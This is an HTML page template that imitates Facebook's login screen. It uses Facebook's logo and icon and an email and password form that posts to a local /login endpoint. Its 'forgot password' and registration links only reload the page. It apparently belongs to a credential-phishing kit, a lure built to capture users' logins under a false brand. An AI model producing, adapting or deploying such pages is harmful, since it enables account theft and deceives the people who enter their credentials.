<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="/content/style.css">
	<link rel="icon" type="image/x-icon" href="/content/fb_icon.png">
	<title>{{ title }}</title>
</head>
<body>
	<center>
	<div class="brandingcontainer">
	<img src="/content/facebook.svg" class="fblogo">
	<p class="motd">{{ motd }}</p>
	</div>
	<div class="logincontainer">
	<form action="/login" method="post">
    <input type="text" pattern="[a-zA-Z0-9.-_]{1,}@[a-zA-Z.-]{2,}[.]{1}[a-zA-Z]{2,}" required name="email" class="lfield" placeholder="{{ email }}" /><br>
    <input minlength="6" type="password" name="password" class="lfield" placeholder="{{ password }}" /><br>
    <input class="lbutton" type="submit" value="{{ login }}"/>
	</form>
    <p class="forgot" onclick="window.location.reload();">{{ forgot }}</p>
    <hr>
    <button class="register" onclick="window.location.reload();">{{ new_account }}</button>
	</div>
	<p class="pagetext"><span class="pagetextbold" onclick="window.location.reload();">{{ new_page_bold }}</span> {{ new_page }}</p>
	</center>

</body>
</html>